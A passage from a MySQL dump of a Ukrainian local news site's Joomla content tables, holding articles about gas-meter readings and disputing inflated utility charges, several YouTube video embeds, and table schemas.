00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,6,'','',1,195,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2535,2958,'30 вересня 2021 року – останній день поточного газового року','30-veresnya-2021-roku-ostannij-den-potochnogo-gazovogo-roku','<!--StartFragment--><p><img alt=\"\" class=\"fr-dii fr-fin\" src=\"https://malehus.in.ua/images/stories/0053333.gif\"><br></p><p>Увага! Сьогодні закінчується газовий рік, який  тривав з 1 жовтня 2020 року по 30 вересня 2021 року. А  отже, до 5 жовтня 2021 року усім побутовим споживачам обов’язково  необхідно передати своєму облгазу фактичні покази власного лічильника станом на  кінець вересня 2021 року.</p><p>Переконайтесь, що ваші покази облгаз взяв до відома.  Адже саме на підставі фактично спожитого газу за період із 1 жовтня 2020 року  по 30 вересня 2021 року буде здійснюватися розрахунок щомісячної плати за  доставку газу кожному домогосподарству на наступний період - з 1 січня 2022  року і впродовж усього 2022 року. Будьте пильними! Не дайте облгазу себе  ошукати та домалювати вам віртуальні куби, яких ви насправді не споживали.</p><p>З Кодексу ГРМ:</p><p>1. Розрахунки споживача за послугу розподілу  природного газу, що надається Оператором ГРМ за договором розподілу природного  газу, здійснюються виходячи з величини річної замовленої потужності об’єкта  (об’єктів) споживача та оплачуються споживачем рівномірними частками протягом  календарного року.</p><p>2. Місячна вартість послуги розподілу природного газу  визначається як добуток 1/12 річної замовленої потужності об’єкта (об’єктів)  споживача на тариф, встановлений Регулятором для відповідного Оператора ГРМ із  розрахунку місячної вартості одного кубічного метра замовленої потужності.</p><p>3. Річна замовлена потужність (за замовчуванням)  об’єкта (об’єктів) споживача на розрахунковий календарний рік визначається  Оператором ГРМ виходячи з фактичного обсягу споживання природного газу цим  об’єктом за газовий рік, що передував розрахунковому календарному року, який  визначається відповідно до вимог цього Кодексу, крім випадків, передбачених  цією главою.</p><p><br></p><!--EndFragment-->','',1,8,'2021-09-30 11:11:30',430,'','2021-09-30 11:14:04',430,0,'0000-00-00 00:00:00','2021-09-30 11:11:30','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,5,'','',1,212,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2536,2959,'Що робити, якщо облгаз не враховує показники вашого лічильника й вимагає сплатити за «зайві» куби?','shcho-robiti-yakshcho-oblgaz-ne-vrakhovue-pokazniki-vashogo-lichilnika-j-vimagae-splatiti-za-zajvi-kubi','<!--StartFragment--><p>Люди масово скаржаться на маніпуляції з показниками газових лічильників.<img src=\"https://malehus.in.ua/images/stories/unnamed.jpg\" alt=\"\" class=\"fr-fir\" width=\"440\"></p><p>Як йдеться в зверненнях до інформаційно-консультаційного центру ГазПравда, облгази ігнорують вчасно передані домогосподарствами показники лічильників. Натомість споживачам виставляються інші показники – значно вищі, ніж споживачі фіксують в особистих кабінетах.</p><p>Незважаючи на обурення споживачів, облгази відмовляються коригувати показники лічильників, мотивуючи це тим, що ті невчасно надали відповідну інформацію – тобто, пізніше 6 числа календарного місяця, що настає за розрахунковим.</p><p>У такому разі експерти ГазПравди радять подавати претензію щодо завищених показів лічильників до облгазу, а також одразу скаргу до НКРЕКП. Адже часто газорозподільна компанія просто ігнорує звернення або відмовляє споживачам. Тому регулятор мав би звернути свою увагу на такі факти.</p><p>ГазПравда підготувала зразки таких претензій та скарг. Документи розміщені на нашому сайті в розділі Бланки.</p><p>Також претензію до облгазу щодо здійснення перерахунку за фактичними показниками лічильника можна скачати тут:&nbsp;<a href=\"https://gazpravda.com.ua/images/2021/Pretenziia_do_oblgaz_pokaz_lich.doc\">https://gazpravda.com.ua/images/2021/Pretenziia_do_oblgaz_pokaz_lich.doc</a></p><p>Скарга до регулятора про незаконні нарахування на основі завищених показників лічильника доступна за посиланням:&nbsp;<a href=\"https://gazpravda.com.ua/images/2021/Skarga_do_NKREKP_pokaz_lich.doc\">https://gazpravda.com.ua/images/2021/Skarga_do_NKREKP_pokaz_lich.doc</a></p><p>Зазначимо, що одна з ймовірних причин подібних маніпуляцій облгазів – це штучне завищення фактичного споживання газу домогосподарствами в поточному газовому році з метою отримання надприбутків при нарахуванні плати за доставку/розподіл блакитного палива у 2022 році. Адже саме на підставі фактично спожитого газу за період із 1 жовтня 2020 року по 30 вересня 2021 року облгаз буде здійснювати розрахунок щомісячної плати за доставку/розподіл газу кожному домогосподарству вже з січня 2022 року та протягом усього 2022 року.</p><p>За матеріалами&nbsp;<a href=\"https://gazpravda.com.ua/\">https://gazpravda.com.ua/</a></p><!--EndFragment-->','',1,8,'2021-10-19 17:08:52',430,'','2021-10-19 17:10:07',430,0,'0000-00-00 00:00:00','2021-10-19 17:08:52','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,4,'','',1,455,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2538,2961,'Просто шедевральний новорічний салют','prosto-shedevralnij-novorichnij-salyut','<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/phZ5U8wJ2pM\" title=\"YouTube video player\" width=\"560\"></iframe></span></p>','',1,8,'2022-01-02 16:50:14',430,'','2022-01-02 16:59:22',430,0,'0000-00-00 00:00:00','2022-01-02 16:50:14','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,3,'','',1,180,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2539,2963,'Посадка турецької адани','posadka-turetskoji-adani','<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/daffbpWL6Vs\" title=\"YouTube video player\" width=\"560\"></iframe></span></p>','',1,137,'2022-01-04 10:44:12',430,'','2022-01-04 10:44:12',0,0,'0000-00-00 00:00:00','2022-01-04 10:44:12','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,2,'','',1,13,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2540,2964,'Моя пара - подарок від OBLAKO','moya-para-podarok-vid-oblako','<p><img src=\"https://malehus.in.ua/images/stories/photo_2022-01-04_14-12-21.jpg\" alt=\"\" class=\"fr-fin fr-dib\" width=\"759\"></p><p><img src=\"https://malehus.in.ua/images/stories/photo_2022-01-04_14-12-26.jpg\" alt=\"\" class=\"fr-fin\" width=\"758\"><br></p>','',1,137,'2022-01-04 12:17:45',430,'','2022-01-04 12:17:45',0,0,'0000-00-00 00:00:00','2022-01-04 12:17:45','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,1,'','',1,86,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2541,2965,'Турецька адана','turetska-adana','<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/RLy91rdbHTo\" title=\"YouTube video player\" width=\"560\"></iframe></span></p>','',1,137,'2022-01-04 17:35:18',430,'','2022-01-04 17:35:18',0,0,'0000-00-00 00:00:00','2022-01-04 17:35:18','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,'','',1,56,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2542,2966,'Виконання дохідної частини бюджетів ОТГ Житомирської області за 2021 рік','vikonannya-dokhidnoji-chastini-byudzhetiv-otg-zhitomirskoji-oblasti-za-2021-rik','<p style=\"text-align: left;\">За даними Департамента фінансів Житомирської ОДА</p><p><img src=\"https://malehus.in.ua/images/stories/unnamed.jpg\" alt=\"\" class=\"fr-fin fr-dib\"><br></p>','',1,8,'2022-01-17 13:45:27',430,'','2022-01-17 13:45:27',0,0,'0000-00-00 00:00:00','2022-01-17 13:45:27','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,2,'','',1,389,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2543,2967,'Безпечне місто Малин','bezpechne-misto-malin','<iframe height=\"480\" src=\"https://www.google.com/maps/d/embed?mid=1FjGG3vOsT9Yn4OkQUVhqRfZ1AguRkk0I&amp;ehbc=2E312F\" width=\"640\"></iframe>','',0,8,'2022-01-31 15:06:55',430,'','2022-01-31 15:06:55',0,0,'0000-00-00 00:00:00','2022-01-31 15:06:55','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,1,'','',1,123,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2544,2968,'Вечірнє небо над Малином','vechirne-nebo-nad-malinom','<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/b-2V_ckN6xU\" title=\"YouTube video player\" width=\"560\"></iframe></span></p>','',1,8,'2022-07-24 06:44:53',430,'','2022-07-24 06:44:53',0,0,'0000-00-00 00:00:00','2022-07-24 06:44:53','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,'','',1,94,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2545,2969,'Пора на сніданок','pora-na-snidanok','<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/WRgJpiljAAw\" title=\"YouTube video player\" width=\"560\"></iframe></span></p>','',1,128,'2022-07-24 06:51:54',430,'','2022-07-24 06:51:54',0,0,'0000-00-00 00:00:00','2022-07-24 06:51:54','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,'','',1,8,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2546,2970,'З Днем Соборності України!','z-dnem-sobornosti-ukrajini','<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/zc85mnU49vM\" title=\"YouTube video player\" width=\"560\"></iframe></span></p>','',1,134,'2023-01-22 09:43:22',430,'','2023-01-22 09:43:22',0,0,'0000-00-00 00:00:00','2023-01-22 09:43:22','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,'','',1,4,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','','');
/*!40000 ALTER TABLE `fw3gt_content` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_content_frontpage`
--

DROP TABLE IF EXISTS `fw3gt_content_frontpage`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_content_frontpage` (
  `content_id` int(11) NOT NULL DEFAULT '0',
  `ordering` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`content_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_content_frontpage`
--

LOCK TABLES `fw3gt_content_frontpage` WRITE;
/*!40000 ALTER TABLE `fw3gt_content_frontpage` DISABLE KEYS */;
INSERT INTO `fw3gt_content_frontpage` VALUES (100,58),(776,57),(901,51),(1033,52),(1295,53),(1346,54),(1408,55),(1472,56),(2453,49),(2454,50),(2468,48),(2469,47),(2470,46),(2472,45),(2473,44),(2475,43),(2476,42),(2477,41),(2478,40),(2479,39),(2480,38),(2481,37),(2483,36),(2484,35),(2485,34),(2486,33),(2487,32),(2490,31),(2491,30),(2492,29),(2493,28),(2495,27),(2496,26),(2497,25),(2498,24),(2501,23),(2502,22),(2504,21),(2505,20),(2508,19),(2519,18),(2520,17),(2524,16),(2525,15),(2526,14),(2527,13),(2528,12),(2529,11),(2530,10),(2533,9),(2534,8),(2535,7),(2536,6),(2538,5),(2542,4),(2543,3),(2544,2),(2546,1);
/*!40000 ALTER TABLE `fw3gt_content_frontpage` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_content_rating`
--

DROP TABLE IF EXISTS `fw3gt_content_rating`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_content_rating` (
  `content_id` int(11) NOT NULL DEFAULT '0',
  `rating_sum` int(10) unsigned NOT NULL DEFAULT '0',
  `rating_count` int(10) unsigned NOT NULL DEFAULT '0',
  `lastip` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`content_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_content_rating`
--

LOCK TABLES `fw3gt_content_rating` WRITE;
/*!40000 ALTER TABLE `fw3gt_content_rating` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_content_rating` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_content_types`
--

DROP TABLE IF EXISTS `fw3gt_content_types`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_content_types` (
  `type_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `type_title` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `type_alias` varchar(400) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `table` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `rules` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `field_mappings` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `router` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `content_history_options` varchar(5120) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'JSON string for com_contenthistory options',
  PRIMARY KEY (`type_id`),
  KEY `idx_alias` (`type_alias`(100))
) ENGINE=InnoDB AUTO_INCREMENT=10007 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_content_types`
--

LOCK TABLES `fw3gt_content_types` WRITE;
/*!40000 ALTER TABLE `fw3gt_content_types` DISABLE KEYS */;
